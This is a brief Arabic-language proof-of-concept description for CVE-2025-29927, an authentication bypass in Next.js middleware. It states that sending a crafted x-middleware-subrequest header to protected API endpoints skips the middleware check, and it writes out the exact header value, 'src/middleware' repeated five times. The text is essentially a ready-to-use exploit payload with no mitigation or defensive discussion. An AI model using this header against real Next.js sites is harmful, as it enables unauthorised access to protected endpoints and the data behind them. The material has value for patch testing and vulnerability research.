
إثبات المفهوم لـ CVE-2025-29927 الذي يتجاوز مصادقة الوسيطة في Next.js عن طريق إرسال ترويسة x-middleware-subrequest مصممة خصيصًا إلى نقاط نهاية API المحمية.
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware كرأس